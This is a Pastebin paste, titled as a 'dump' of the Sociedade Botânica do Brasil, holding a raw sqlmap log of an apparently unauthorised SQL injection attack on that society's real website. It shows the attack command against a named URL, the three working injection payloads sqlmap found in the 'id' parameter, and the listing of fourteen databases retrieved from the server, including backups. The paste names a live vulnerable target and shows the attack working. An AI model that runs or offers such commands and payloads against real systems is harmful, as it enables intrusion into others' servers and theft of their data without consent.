API tools faq
paste
Frenetic

[Frenetic] Dump Sociedade Botânica do Brasil

Frenetic
Dec 14th, 2017
55
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.96 KB | None | 0 0
raw download clone embed print report
  1. $ python sqlmap.py -u http://www.botanica.org.br/go_news.php?id=62 --dbs --random-agent
  2. ___
  3. __H__
  4. ___ ___[)]_____ ___ ___ {1.1.12.12#dev}
  5. |_ -| . [,] | .'| . |
  6. |___|_ [.]_|_|_|__,| _|
  7. |_|V |_| http://sqlmap.org
  8.  
  9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  10.  
  11. [*] starting at 22:42:04
  12.  
  13. [22:42:05] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1' from file '/home/Frenetic/SQLMAP/txt/user-agents.txt'
  14. [22:42:09] [INFO] testing connection to the target URL
  15. [22:42:10] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  16. [22:42:10] [INFO] testing if the target URL content is stable
  17. [22:42:11] [INFO] target URL content is stable
  18. [22:42:11] [INFO] testing if GET parameter 'id' is dynamic
  19. [22:42:11] [INFO] confirming that GET parameter 'id' is dynamic
  20. [22:42:11] [INFO] GET parameter 'id' is dynamic
  21. [22:42:13] [INFO] heuristics detected web page charset 'ascii'
  22. [22:42:13] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  23. [22:42:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
  24. [22:42:13] [INFO] testing for SQL injection on GET parameter 'id'
  25. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
  26. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
  27. [22:42:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  28. [22:42:17] [WARNING] reflective value(s) found and filtering out
  29. [22:42:18] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Em")
  30. [22:42:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
  31. [22:42:19] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
  32. [22:42:19] [INFO] testing 'MySQL inline queries'
  33. [22:42:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
  34. [22:42:19] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
  35. [22:42:47] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
  36. [22:42:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  37. [22:42:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  38. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
  39. sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
  40. ---
  41. Parameter: id (GET)
  42. Type: boolean-based blind
  43. Title: AND boolean-based blind - WHERE or HAVING clause
  44. Payload: id=62 AND 5236=5236
  45.  
  46. Type: error-based
  47. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  48. Payload: id=62 AND (SELECT 3948 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3948=3948,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  49.  
  50. Type: AND/OR time-based blind
  51. Title: MySQL >= 5.0.12 AND time-based blind
  52. Payload: id=62 AND SLEEP(5)
  53. ---
  54. [22:43:04] [INFO] the back-end DBMS is MySQL
  55. web application technology: Apache 2.4.29
  56. back-end DBMS: MySQL >= 5.0
  57. [22:43:04] [INFO] fetching database names
  58. [22:43:06] [INFO] used SQL query returns 14 entries
  59. [22:43:06] [INFO] retrieved: information_schema
  60. [22:43:06] [INFO] retrieved: botanica_acta
  61. [22:43:07] [INFO] retrieved: botanica_acta02
  62. [22:43:07] [INFO] retrieved: botanica_acta03
  63. [22:43:08] [INFO] retrieved: botanica_acta04
  64. [22:43:08] [INFO] retrieved: botanica_acta05
  65. [22:43:08] [INFO] retrieved: botanica_acta1
  66. [22:43:08] [INFO] retrieved: botanica_eventos
  67. [22:43:09] [INFO] retrieved: botanica_herbarios
  68. [22:43:09] [INFO] retrieved: botanica_herbarios_bkp
  69. [22:43:09] [INFO] retrieved: botanica_herbarios_old
  70. [22:43:09] [INFO] retrieved: botanica_re-centro-oeste
  71. [22:43:09] [INFO] retrieved: botanica_sbb
  72. [22:43:10] [INFO] retrieved: botanica_sbb_bkp
  73. available databases [14]:
  74. [*] botanica_acta
  75. [*] botanica_acta02
  76. [*] botanica_acta03
  77. [*] botanica_acta04
  78. [*] botanica_acta05
  79. [*] botanica_acta1
  80. [*] botanica_eventos
  81. [*] botanica_herbarios
  82. [*] botanica_herbarios_bkp
  83. [*] botanica_herbarios_old
  84. [*] botanica_re-centro-oeste
  85. [*] botanica_sbb
  86. [*] botanica_sbb_bkp
  87. [*] information_schema
  88.  
  89. [22:43:10] [INFO] fetched data logged to text files under '/home/Frenetic/.sqlmap/output/www.botanica.org.br'
  90.  
  91. [*] shutting down at 22:43:10
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!